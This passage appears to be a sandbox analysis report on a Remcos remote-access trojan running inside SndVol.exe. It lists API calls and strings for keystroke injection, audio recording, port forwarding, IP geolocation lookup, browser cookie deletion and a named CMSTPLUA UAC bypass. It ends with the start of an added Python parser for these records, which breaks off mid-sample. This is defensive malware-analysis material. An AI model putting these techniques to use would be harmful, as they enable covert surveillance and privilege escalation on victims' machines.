• lstrcpynA.KERNEL32(02993B68,Remcos,00000080), ref: 0293C9D9
• Shell_NotifyIconA.SHELL32(00000000,02993B50), ref: 0293C9EF
• TranslateMessage.USER32(?), ref: 0293C9FB
• DispatchMessageA.USER32(?), ref: 0293CA05
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0293CA12
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,02972E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 02972BD6
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,02972E03,00000000,00000000,?,00000001,?,?,?,?), ref: 02972C59
• __alloca_probe_16.LIBCMT ref: 02972C91
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,02972E03,?,02972E03,00000000,00000000,?,00000001,?,?,?,?), ref: 02972CEC
• __alloca_probe_16.LIBCMT ref: 02972D3B
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,02972E03,00000000,00000000,?,00000001,?,?,?,?), ref: 02972D03
  • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,02972E03,00000000,00000000,?,00000001,?,?,?,?), ref: 02972D7F
• __freea.LIBCMT ref: 02972DAA
• __freea.LIBCMT ref: 02972DB6
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• String ID:
• API String ID: 201697637-0
APIs
  • Part of subcall function 02966EBF: GetLastError.KERNEL32(?,00000000,02960A45,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966EC3
  • Part of subcall function 02966EBF: _free.LIBCMT ref: 02966EF6
  • Part of subcall function 02966EBF: SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F37
  • Part of subcall function 02966EBF: _abort.LIBCMT ref: 02966F3D
• _memcmp.LIBVCRUNTIME ref: 029646A3
• _free.LIBCMT ref: 02964714
• _free.LIBCMT ref: 0296472D
• _free.LIBCMT ref: 0296475F
• _free.LIBCMT ref: 02964768
• _free.LIBCMT ref: 02964774
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
• API String ID: 3578746661-168337528
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,02985554), ref: 02936F24
• CloseHandle.KERNEL32(00000000), ref: 02936F2D
• DeleteFileA.KERNEL32(00000000), ref: 02936F3C
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 02936EF0
  • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
• String ID: <$@$Temp
• API String ID: 1107811701-1032778388
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,02985454,?,?,00000000,02927273,00000000,?,0000000A,00000000), ref: 02926C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,02927273,00000000,?,0000000A,00000000), ref: 02926C80
  • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
• CloseHandle.KERNEL32(00000000,?,?,00000000,02927273,00000000,?,0000000A,00000000,00000000), ref: 02926CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 02926CDD
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 02926D08
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 02926D18
  • Part of subcall function 0292455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0292460E,00000000,?,?), ref: 0292456A
  • Part of subcall function 0292455B: SetEvent.KERNEL32(?,?,?,0292460E,00000000,?,?), ref: 02924588
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0295D564,0295D564,?,?,?,02969BA1,00000001,00000001,1AE85006), ref: 029699AA
• __alloca_probe_16.LIBCMT ref: 029699E2
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,02969BA1,00000001,00000001,1AE85006,?,?,?), ref: 02969A30
• __alloca_probe_16.LIBCMT ref: 02969AC7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02969B2A
• __freea.LIBCMT ref: 02969B37
  • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
• __freea.LIBCMT ref: 02969B40
• __freea.LIBCMT ref: 02969B65
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32 ref: 02938B08
                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 02938B30
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938B57
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938B75
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938B95
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938BBA
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 02938BDC
                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 02938BFF
                                                                                                                          • Part of subcall function 02938AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 02938AB7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSend$Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1167301434-0
                                                                                                                        • Opcode ID: fc2577fde5b75c17f899923718ec5858afdf759b0479a517dfd3e698f4216c4f
                                                                                                                        • Instruction ID: 90cc2952f959ab9d788ea899c4c33aae66541f2963d42fe0b608561d62af11f4
                                                                                                                        • Opcode Fuzzy Hash: fc2577fde5b75c17f899923718ec5858afdf759b0479a517dfd3e698f4216c4f
                                                                                                                        • Instruction Fuzzy Hash: EC315071248349A9E312DF65D840F9FFBECAFC9B44F04090FB98497290DAA1D94C87A7
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 02967EBC
                                                                                                                        • _free.LIBCMT ref: 02967EE0
                                                                                                                        • _free.LIBCMT ref: 02968067
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0297D478), ref: 02968079
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0299179C,000000FF,00000000,0000003F,00000000,?,?), ref: 029680F1
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,029917F0,000000FF,?,0000003F,00000000,?), ref: 0296811E
                                                                                                                        • _free.LIBCMT ref: 02968233
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314583886-0
                                                                                                                        • Opcode ID: 906be47a6aa2ea79a94081f821ebc87e0d9c24fc0cb33b18926b023bdc7d2f28
                                                                                                                        • Instruction ID: 75946b44e7e2d5a446bd74ea0ef759f7ce8972d9d90e9a617cc690f605b5fb47
                                                                                                                        • Opcode Fuzzy Hash: 906be47a6aa2ea79a94081f821ebc87e0d9c24fc0cb33b18926b023bdc7d2f28
                                                                                                                        • Instruction Fuzzy Hash: 3EC1F571904206AFDB21DFB88C48AFABBFDFF85364F1449AAD89597240E7318A45CB50
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 9b4a2842c4e557ff9bff1a801b336682b23ce2d42175fa4011d3b8274692137e
                                                                                                                        • Instruction ID: c5f0d5c19cc74ea6f229d02ab3d7e9cc82c88064d1598ac8b631f67f3ae94fd4
                                                                                                                        • Opcode Fuzzy Hash: 9b4a2842c4e557ff9bff1a801b336682b23ce2d42175fa4011d3b8274692137e
                                                                                                                        • Instruction Fuzzy Hash: DC61D172D00205AFDB20DF68D845BBEBBF9EF44720F2444AAE956EB640E7309981CF50
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0296A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0296A105
                                                                                                                        • __fassign.LIBCMT ref: 0296A180
                                                                                                                        • __fassign.LIBCMT ref: 0296A19B
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0296A1C1
                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0296A838,00000000,?,?,?,?,?,?,?,?,?,0296A838,?), ref: 0296A1E0
                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0296A838,00000000,?,?,?,?,?,?,?,?,?,0296A838,?), ref: 0296A219
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: 67fb02fb1ba213530875a4348e9f1f27a3e681e34878652a5f1ac22d2c59eaf0
                                                                                                                        • Instruction ID: 95fe592f421abd7afbe4172a48eeaaeb1749813122a8e4b7234a194406a87197
                                                                                                                        • Opcode Fuzzy Hash: 67fb02fb1ba213530875a4348e9f1f27a3e681e34878652a5f1ac22d2c59eaf0
                                                                                                                        • Instruction Fuzzy Hash: 18518C70E442099FDB10CFA8D889AFEBBF8FF49310F14455AE955E7281E731A951CB60
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02957AAB
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 02957AB3
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02957B41
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 02957B6C
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02957BC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: d933ff5505bcdefe459766e24d2ef58791f4240562be5ec4fb7d1557f031119d
                                                                                                                        • Instruction ID: 3c340fa363095be7629ce148d683c8a954401674cbc9bd2f1390e0b8612f673e
                                                                                                                        • Opcode Fuzzy Hash: d933ff5505bcdefe459766e24d2ef58791f4240562be5ec4fb7d1557f031119d
                                                                                                                        • Instruction Fuzzy Hash: C041B134B00229DBCF10DFA8C844AEEFBBAAF45328F148599EC155B281D7319B15CF90
                                                                                                                        APIs
                                                                                                                        • _strftime.LIBCMT ref: 02921AD3
                                                                                                                          • Part of subcall function 02921BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02921C54
                                                                                                                        • waveInUnprepareHeader.WINMM(02991AC0,00000020,00000000,?), ref: 02921B85
                                                                                                                        • waveInPrepareHeader.WINMM(02991AC0,00000020), ref: 02921BC3
                                                                                                                        • waveInAddBuffer.WINMM(02991AC0,00000020), ref: 02921BD2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                        • String ID: %Y-%m-%d %H.%M$.wav
                                                                                                                        • API String ID: 3809562944-3597965672
                                                                                                                        • Opcode ID: 13bca41a6ef7f933cd5766f1bd8dcae0aaadd00f815cf6667cca5dd02364e32a
                                                                                                                        • Instruction ID: 947cf3abe1358370e304ed7720de1a2b8b194851ea443746556732181b9e3774
                                                                                                                        • Opcode Fuzzy Hash: 13bca41a6ef7f933cd5766f1bd8dcae0aaadd00f815cf6667cca5dd02364e32a
                                                                                                                        • Instruction Fuzzy Hash: 083161319493119BD714EB28DC50EAB77EAFB94320F40482DE15E821A5EF705E2DCF66
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02932513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 02932537
                                                                                                                          • Part of subcall function 02932513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 02932554
                                                                                                                          • Part of subcall function 02932513: RegCloseKey.KERNELBASE(?), ref: 0293255F
                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0292B76C
                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0292B779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                        • API String ID: 1133728706-4073444585
                                                                                                                        • Opcode ID: 70cdfa33fc27e818a291210346b6065a3e0e509e7649ff5f1ce73285a2af1d94
                                                                                                                        • Instruction ID: 9a8fb244a2cbd371f8a871a5be749adfe2a18e9fe5843a410abcf83db5c6330f
                                                                                                                        • Opcode Fuzzy Hash: 70cdfa33fc27e818a291210346b6065a3e0e509e7649ff5f1ce73285a2af1d94
                                                                                                                        • Instruction Fuzzy Hash: 9F21B131940129A6DB04FBF1DC759EE73AEAFD0318F440018D5066B189EF605A1DCAD1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1e5b3ae138bd3616ad669875e2ba9338ea91d28566e22c458bf645baf173a61b
                                                                                                                        • Instruction ID: 25bc8cfab93c790ff16ae1a71b4621616902cdb9215bec0b393faea854b8501f
                                                                                                                        • Opcode Fuzzy Hash: 1e5b3ae138bd3616ad669875e2ba9338ea91d28566e22c458bf645baf173a61b
                                                                                                                        • Instruction Fuzzy Hash: 0011E971608255BBDB216FB6CC48E7B7AADEFC1770B960A19FC15C7240DA758800CBB0
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0293A53E
                                                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0293A554
                                                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0293A56D
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0293A5B3
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0293A5B6
                                                                                                                        Strings
                                                                                                                        • http://geoplugin.net/json.gp, xrefs: 0293A54E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                                                        • API String ID: 3121278467-91888290
                                                                                                                        • Opcode ID: c2e760c2b0dc854aa365aa6347d07904f7665e0101e9fee4ffcb1899e994ae75
                                                                                                                        • Instruction ID: 0b5909a474d79cbf4f4b927c18afa32aa994e50fb052536a5c08cc23c5b68bf1
                                                                                                                        • Opcode Fuzzy Hash: c2e760c2b0dc854aa365aa6347d07904f7665e0101e9fee4ffcb1899e994ae75
                                                                                                                        • Instruction Fuzzy Hash: 4E11C4316093226BD224EA559C44EBF7F9DEF85260F00093DF909D2140CB54980CCAF1
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\SndVol.exe), ref: 02926835
  • Part of subcall function 02926764: _wcslen.LIBCMT ref: 02926788
  • Part of subcall function 02926764: CoGetObject.OLE32(?,00000024,029859B0,00000000), ref: 029267E9
• CoUninitialize.OLE32 ref: 0292688E
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\SysWOW64\SndVol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-991305910
• Opcode ID: d7293d1b83ab6227da3143aedb4e2c4aa086ef2763ad81a0a5833cc44e2c9ca3
• Instruction ID: f14025b64bf6a89676d8c40d1f4b6d15abdd880abf770b47f59a1b67141cd5eb
• Opcode Fuzzy Hash: d7293d1b83ab6227da3143aedb4e2c4aa086ef2763ad81a0a5833cc44e2c9ca3
• Instruction Fuzzy Hash: EE01DE727013246FF2286B50DC0AF7B775DDF81A29F66012EF54586588EBA1A8084AA1
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0292B2E4
• GetLastError.KERNEL32 ref: 0292B2EE
Strings
• [Chrome Cookies not found], xrefs: 0292B308
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0292B2AF
• [Chrome Cookies found, cleared!], xrefs: 0292B314
• UserProfile, xrefs: 0292B2B4
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
• Opcode ID: 44649937a1e87f5d349c64809e38230953eae0fb78e8366ad4f521dadbe9d8b2
• Instruction ID: 0ecf2dbb62b0cf4fe309978534c68039877f0c96cb7b5dc0eea80c42ea5d8dbf
• Opcode Fuzzy Hash: 44649937a1e87f5d349c64809e38230953eae0fb78e8366ad4f521dadbe9d8b2
• Instruction Fuzzy Hash: 8B017D32A450246BD704BAB4DE7BDFE3769ADE0718B810515E017531CEFE41591CCBC1
APIs
• AllocConsole.KERNEL32(02994358), ref: 0293BEB9
• ShowWindow.USER32(00000000,00000000), ref: 0293BED2
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0293BEF7
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Console$AllocOutputShowWindow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• API String ID: 2425139147-2527699604
• Opcode ID: fd71768ef4fac957fb930b72692f3b7ba5ae7016629bdee77b8a4e3ed8b87bd7
• Instruction ID: d95102c85850bad6513251351ec8d411a7732899d76035de5ef4d048c92c79c4
• Opcode Fuzzy Hash: fd71768ef4fac957fb930b72692f3b7ba5ae7016629bdee77b8a4e3ed8b87bd7
• Instruction Fuzzy Hash: 42018FB1EC03046BEA14FBF08D5AFEE77AD6F94740F440821B605E7081DAA5A5188F65
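The records above give, per function, the APIs called and the strings referenced: the HTTP fetch of http://geoplugin.net/json.gp, the COM helper that calls CoGetObject and carries the UACMe method name "[+] ucmCMLuaUtilShellExecMethod" next to the path C:\Windows\SysWOW64\SndVol.exe (the CMSTPLUA UAC bypass listed in the signatures at the top of this report), the routine that deletes the Chrome Cookies database under the user profile, and the console banner "Remcos v 5.3.0 Pro". Reading dozens of such records by hand is slow, so what follows is a small Python parser for this record format, added here as an example and not part of this report, of Joe Sandbox, or of the sample: it pulls the API names and strings out of each record and tags the ones worth a second look. The three records embedded as input are copied from this report; the tag names and the classification rules are my own. One quirk it handles: the "String ID" line joins strings with "$", so a string that itself ends in "$" (CONOUT$) loses that character when only the joined form is available, which is why the per-xref "Strings" list is preferred whenever a record has one.

```python
"""Parser and triage for Joe Sandbox per-function records (the APIs / Strings /
Similarity blocks the Joe Sandbox IDA plugin emits). Added example for this
report, not Joe Sandbox code; SAMPLE is copied from the report, RULES are my own."""
from typing import Dict, List

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}

SAMPLE = r"""
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\SndVol.exe), ref: 02926835
  • Part of subcall function 02926764: CoGetObject.OLE32(?,00000024,029859B0,00000000), ref: 029267E9
• CoUninitialize.OLE32 ref: 0292688E
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\SysWOW64\SndVol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• Opcode ID: d7293d1b83ab6227da3143aedb4e2c4aa086ef2763ad81a0a5833cc44e2c9ca3
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0292B2E4
• GetLastError.KERNEL32 ref: 0292B2EE
Strings
• [Chrome Cookies not found], xrefs: 0292B308
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0292B2AF
• [Chrome Cookies found, cleared!], xrefs: 0292B314
• UserProfile, xrefs: 0292B2B4
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• Opcode ID: 44649937a1e87f5d349c64809e38230953eae0fb78e8366ad4f521dadbe9d8b2
APIs
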